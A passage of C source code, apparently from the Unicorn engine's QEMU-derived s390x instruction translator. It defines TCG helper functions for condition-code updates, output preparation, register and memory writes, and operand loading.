tcg_temp_free_i32(tcg_ctx, r2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_pcistb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); TCGv_i32 ar = tcg_const_i32(tcg_ctx, get_field(s, b2)); gen_helper_pcistb(tcg_ctx, tcg_ctx->cpu_env, r1, r3, o->addr1, ar); tcg_temp_free_i32(tcg_ctx, ar); tcg_temp_free_i32(tcg_ctx, r1); tcg_temp_free_i32(tcg_ctx, r3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mpcifc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 ar = tcg_const_i32(tcg_ctx, get_field(s, b2)); gen_helper_mpcifc(tcg_ctx, tcg_ctx->cpu_env, r1, o->addr1, ar); tcg_temp_free_i32(tcg_ctx, ar); tcg_temp_free_i32(tcg_ctx, r1); set_cc_static(s); return DISAS_NEXT; } #include "translate_vx.inc.c" /* ====================================================================== */ /* The "Cc OUTput" generators. Given the generated output (and in some cases the original inputs), update the various cc data structures in order to be able to compute the new condition code. */ static void cout_abs32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_ABS_32, o->out); } static void cout_abs64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_ABS_64, o->out); } static void cout_adds32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADD_32, o->in1, o->in2, o->out); } static void cout_adds64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADD_64, o->in1, o->in2, o->out); } static void cout_addu32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADDU_32, o->in1, o->in2, o->out); } static void cout_addu64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADDU_64, o->in1, o->in2, o->out); } static void cout_addc32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADDC_32, o->in1, o->in2, o->out); } static void cout_addc64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_ADDC_64, o->in1, o->in2, o->out); } static void cout_cmps32(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_LTGT_32, o->in1, o->in2); } static void cout_cmps64(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_LTGT_64, o->in1, o->in2); } static void cout_cmpu32(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_LTUGTU_32, o->in1, o->in2); } static void cout_cmpu64(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_LTUGTU_64, o->in1, o->in2); } static void cout_f32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NZ_F32, o->out); } static void cout_f64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NZ_F64, o->out); } static void cout_f128(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_NZ_F128, o->out, o->out2); } static void cout_nabs32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NABS_32, o->out); } static void cout_nabs64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NABS_64, o->out); } static void cout_neg32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_COMP_32, o->out); } static void cout_neg64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_COMP_64, o->out); } static void cout_nz32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cc_dst, o->out); gen_op_update1_cc_i64(s, CC_OP_NZ, tcg_ctx->cc_dst); } static void cout_nz64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_NZ, o->out); } static void cout_s32(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_LTGT0_32, o->out); } static void cout_s64(DisasContext *s, DisasOps *o) { gen_op_update1_cc_i64(s, CC_OP_LTGT0_64, o->out); } static void cout_subs32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUB_32, o->in1, o->in2, o->out); } static void cout_subs64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUB_64, o->in1, o->in2, o->out); } static void cout_subu32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUBU_32, o->in1, o->in2, o->out); } static void cout_subu64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUBU_64, o->in1, o->in2, o->out); } static void cout_subb32(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUBB_32, o->in1, o->in2, o->out); } static void cout_subb64(DisasContext *s, DisasOps *o) { gen_op_update3_cc_i64(s, CC_OP_SUBB_64, o->in1, o->in2, o->out); } static void cout_tm32(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_TM_32, o->in1, o->in2); } static void cout_tm64(DisasContext *s, DisasOps *o) { gen_op_update2_cc_i64(s, CC_OP_TM_64, o->in1, o->in2); } /* ====================================================================== */ /* The "PREParation" generators. These initialize the DisasOps.OUT fields with the TCG register to which we will write. Used in combination with the "wout" generators, in some cases we need a new temporary, and in some cases we can write to a TCG global. */ static void prep_new(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_temp_new_i64(tcg_ctx); } #define SPEC_prep_new 0 static void prep_new_P(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_temp_new_i64(tcg_ctx); o->out2 = tcg_temp_new_i64(tcg_ctx); } #define SPEC_prep_new_P 0 static void prep_r1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = tcg_ctx->regs[get_field(s, r1)]; o->g_out = true; } #define SPEC_prep_r1 0 static void prep_r1_P(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); o->out = tcg_ctx->regs[r1]; o->out2 = tcg_ctx->regs[r1 + 1]; o->g_out = o->g_out2 = true; } #define SPEC_prep_r1_P SPEC_r1_even /* Whenever we need x1 in addition to other inputs, we'll load it to out/out2 */ static void prep_x1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->out = load_freg(tcg_ctx, get_field(s, r1)); o->out2 = load_freg(tcg_ctx, get_field(s, r1) + 2); } #define SPEC_prep_x1 SPEC_r1_f128 /* ====================================================================== */ /* The "Write OUTput" generators. These generally perform some non-trivial copy of data to TCG globals, or to main memory. The trivial cases are generally handled by having a "prep" generator install the TCG global as the destination of the operation. */ static void wout_r1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_r1 0 static void wout_r1_8(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->regs[r1], tcg_ctx->regs[r1], o->out, 0, 8); } #define SPEC_wout_r1_8 0 static void wout_r1_16(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->regs[r1], tcg_ctx->regs[r1], o->out, 0, 16); } #define SPEC_wout_r1_16 0 static void wout_r1_32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg32_i64(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_r1_32 0 static void wout_r1_32h(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg32h_i64(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_r1_32h 0 static void wout_r1_P32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); store_reg32_i64(tcg_ctx, r1, o->out); store_reg32_i64(tcg_ctx, r1 + 1, o->out2); } #define SPEC_wout_r1_P32 SPEC_r1_even static void wout_r1_D32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); store_reg32_i64(tcg_ctx, r1 + 1, o->out); tcg_gen_shri_i64(tcg_ctx, t, o->out, 32); store_reg32_i64(tcg_ctx, r1, t); tcg_temp_free_i64(tcg_ctx, t); } #define SPEC_wout_r1_D32 SPEC_r1_even static void wout_r3_P32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); store_reg32_i64(tcg_ctx, r3, o->out); store_reg32_i64(tcg_ctx, r3 + 1, o->out2); } #define SPEC_wout_r3_P32 SPEC_r3_even static void wout_r3_P64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); store_reg(tcg_ctx, r3, o->out); store_reg(tcg_ctx, r3 + 1, o->out2); } #define SPEC_wout_r3_P64 SPEC_r3_even static void wout_e1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_freg32_i64(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_e1 0 static void wout_f1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_freg(tcg_ctx, get_field(s, r1), o->out); } #define SPEC_wout_f1 0 static void wout_x1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int f1 = get_field(s, r1); store_freg(tcg_ctx, f1, o->out); store_freg(tcg_ctx, f1 + 2, o->out2); } #define SPEC_wout_x1 SPEC_r1_f128 static void wout_cond_r1r2_32(DisasContext *s, DisasOps *o) { if (get_field(s, r1) != get_field(s, r2)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg32_i64(tcg_ctx, get_field(s, r1), o->out); } } #define SPEC_wout_cond_r1r2_32 0 static void wout_cond_e1e2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, r1) != get_field(s, r2)) { store_freg32_i64(tcg_ctx, get_field(s, r1), o->out); } } #define SPEC_wout_cond_e1e2 0 static void wout_m1_8(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st8(tcg_ctx, o->out, o->addr1, get_mem_index(s)); } #define SPEC_wout_m1_8 0 static void wout_m1_16(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st16(tcg_ctx, o->out, o->addr1, get_mem_index(s)); } #define SPEC_wout_m1_16 0 static void wout_m1_16a(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), MO_TEUW | MO_ALIGN); } #define SPEC_wout_m1_16a 0 static void wout_m1_32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st32(tcg_ctx, o->out, o->addr1, get_mem_index(s)); } #define SPEC_wout_m1_32 0 static void wout_m1_32a(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), MO_TEUL | MO_ALIGN); } #define SPEC_wout_m1_32a 0 static void wout_m1_64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st64(tcg_ctx, o->out, o->addr1, get_mem_index(s)); } #define SPEC_wout_m1_64 0 static void wout_m1_64a(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st_i64(tcg_ctx, o->out, o->addr1, get_mem_index(s), MO_TEQ | MO_ALIGN); } #define SPEC_wout_m1_64a 0 static void wout_m2_32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_qemu_st32(tcg_ctx, o->out, o->in2, get_mem_index(s)); } #define SPEC_wout_m2_32 0 static void wout_in2_r1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg(tcg_ctx, get_field(s, r1), o->in2); } #define SPEC_wout_in2_r1 0 static void wout_in2_r1_32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; store_reg32_i64(tcg_ctx, get_field(s, r1), o->in2); } #define SPEC_wout_in2_r1_32 0 /* ====================================================================== */ /* The "INput 1" generators. These load the first operand to an insn. */ static void in1_r1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_reg(tcg_ctx, get_field(s, r1)); } #define SPEC_in1_r1 0 static void in1_r1_o(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_ctx->regs[get_field(s, r1)]; o->g_in1 = true; } #define SPEC_in1_r1_o 0 static void in1_r1_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1)]); } #define SPEC_in1_r1_32s 0 static void in1_r1_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1)]); } #define SPEC_in1_r1_32u 0 static void in1_r1_sr32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1)], 32); } #define SPEC_in1_r1_sr32 0 static void in1_r1p1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_reg(tcg_ctx, get_field(s, r1) + 1); } #define SPEC_in1_r1p1 SPEC_r1_even static void in1_r1p1_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1) + 1]); } #define SPEC_in1_r1p1_32s SPEC_r1_even static void in1_r1p1_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r1) + 1]); } #define SPEC_in1_r1p1_32u SPEC_r1_even static void in1_r1_D32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat32_i64(tcg_ctx, o->in1, tcg_ctx->regs[r1 + 1], tcg_ctx->regs[r1]); } #define SPEC_in1_r1_D32 SPEC_r1_even static void in1_r2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_reg(tcg_ctx, get_field(s, r2)); } #define SPEC_in1_r2 0 static void in1_r2_sr32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r2)], 32); } #define SPEC_in1_r2_sr32 0 static void in1_r3(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_reg(tcg_ctx, get_field(s, r3)); } #define SPEC_in1_r3 0 static void in1_r3_o(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_ctx->regs[get_field(s, r3)]; o->g_in1 = true; } #define SPEC_in1_r3_o 0 static void in1_r3_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r3)]); } #define SPEC_in1_r3_32s 0 static void in1_r3_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in1, tcg_ctx->regs[get_field(s, r3)]); } #define SPEC_in1_r3_32u 0 static void in1_r3_D32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat32_i64(tcg_ctx, o->in1, tcg_ctx->regs[r3 + 1], tcg_ctx->regs[r3]); } #define SPEC_in1_r3_D32 SPEC_r3_even static void in1_e1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_freg32_i64(tcg_ctx, get_field(s, r1)); } #define SPEC_in1_e1 0 static void in1_f1(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_freg(tcg_ctx, get_field(s, r1)); } #define SPEC_in1_f1 0 /* Load the high double word of an extended (128-bit) format FP number */ static void in1_x2h(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_freg(tcg_ctx, get_field(s, r2)); } #define SPEC_in1_x2h SPEC_r2_f128 static void in1_f3(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = load_freg(tcg_ctx, get_field(s, r3)); } #define SPEC_in1_f3 0 static void in1_la1(DisasContext *s, DisasOps *o) { o->addr1 = get_address(s, 0, get_field(s, b1), get_field(s, d1)); } #define SPEC_in1_la1 0 static void in1_la2(DisasContext *s, DisasOps *o) { int x2 = have_field(s, x2) ? get_field(s, x2) : 0; o->addr1 = get_address(s, x2, get_field(s, b2), get_field(s, d2)); } #define SPEC_in1_la2 0 static void in1_m1_8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld8u(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_8u 0 static void in1_m1_16s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld16s(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_16s 0 static void in1_m1_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld16u(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_16u 0 static void in1_m1_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld32s(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_32s 0 static void in1_m1_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_32u 0 static void in1_m1_64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in1_la1(s, o); o->in1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld64(tcg_ctx, o->in1, o->addr1, get_mem_index(s)); } #define SPEC_in1_m1_64 0 /* ====================================================================== */ /* The "INput 2" generators. These load the second operand to an insn. */ static void in2_r1_o(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_ctx->regs[get_field(s, r1)]; o->g_in2 = true; } #define SPEC_in2_r1_o 0 static void in2_r1_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext16u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r1)]); } #define SPEC_in2_r1_16u 0 static void in2_r1_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r1)]); } #define SPEC_in2_r1_32u 0 static void in2_r1_D32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat32_i64(tcg_ctx, o->in2, tcg_ctx->regs[r1 + 1], tcg_ctx->regs[r1]); } #define SPEC_in2_r1_D32 SPEC_r1_even static void in2_r2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_reg(tcg_ctx, get_field(s, r2)); } #define SPEC_in2_r2 0 static void in2_r2_o(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_ctx->regs[get_field(s, r2)]; o->g_in2 = true; } #define SPEC_in2_r2_o 0 static void in2_r2_nz(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r2 = get_field(s, r2); if (r2 != 0) { o->in2 = load_reg(tcg_ctx, r2); } } #define SPEC_in2_r2_nz 0 static void in2_r2_8s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext8s_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_8s 0 static void in2_r2_8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext8u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_8u 0 static void in2_r2_16s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext16s_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_16s 0 static void in2_r2_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext16u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_16u 0 static void in2_r3(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_reg(tcg_ctx, get_field(s, r3)); } #define SPEC_in2_r3 0 static void in2_r3_sr32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r3)], 32); } #define SPEC_in2_r3_sr32 0 static void in2_r3_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r3)]); } #define SPEC_in2_r3_32u 0 static void in2_r2_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_32s 0 static void in2_r2_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)]); } #define SPEC_in2_r2_32u 0 static void in2_r2_sr32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, o->in2, tcg_ctx->regs[get_field(s, r2)], 32); } #define SPEC_in2_r2_sr32 0 static void in2_e2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_freg32_i64(tcg_ctx, get_field(s, r2)); } #define SPEC_in2_e2 0 static void in2_f2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_freg(tcg_ctx, get_field(s, r2)); } #define SPEC_in2_f2 0 /* Load the low double word of an extended (128-bit) format FP number */ static void in2_x2l(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = load_freg(tcg_ctx, get_field(s, r2) + 2); } #define SPEC_in2_x2l SPEC_r2_f128 static void in2_ra2(DisasContext *s, DisasOps *o) { o->in2 = get_address(s, 0, get_field(s, r2), 0); } #define SPEC_in2_ra2 0 static void in2_a2(DisasContext *s, DisasOps *o) { int x2 = have_field(s, x2) ? get_field(s, x2) : 0; o->in2 = get_address(s, x2, get_field(s, b2), get_field(s, d2)); } #define SPEC_in2_a2 0 static void in2_ri2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, s->base.pc_next + (int64_t)get_field(s, i2) * 2); } #define SPEC_in2_ri2 0 static void in2_sh(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int b2 = get_field(s, b2); int d2 = get_field(s, d2); if (b2 == 0) { o->in2 = tcg_const_i64(tcg_ctx, d2 & 0x3f); } else { o->in2 = get_address(s, 0, b2, d2); tcg_gen_andi_i64(tcg_ctx, o->in2, o->in2, 0x3f); } } #define SPEC_in2_sh 0 static void in2_m2_8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld8u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_8u 0 static void in2_m2_16s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld16s(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_16s 0 static void in2_m2_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld16u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_16u 0 static void in2_m2_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld32s(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_32s 0 static void in2_m2_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld32u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_32u 0 static void in2_m2_32ua(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld_tl(tcg_ctx, o->in2, o->in2, get_mem_index(s), MO_TEUL | MO_ALIGN); } #define SPEC_in2_m2_32ua 0 static void in2_m2_64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld64(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_m2_64 0 static void in2_m2_64a(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_a2(s, o); tcg_gen_qemu_ld_i64(tcg_ctx, o->in2, o->in2, get_mem_index(s), MO_TEQ | MO_ALIGN); } #define SPEC_in2_m2_64a 0 static void in2_mri2_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_ri2(s, o); tcg_gen_qemu_ld16u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_mri2_16u 0 static void in2_mri2_32s(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_ri2(s, o); tcg_gen_qemu_ld32s(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_mri2_32s 0 static void in2_mri2_32u(DisasContext *s, DisasOps *o) { TCGContext 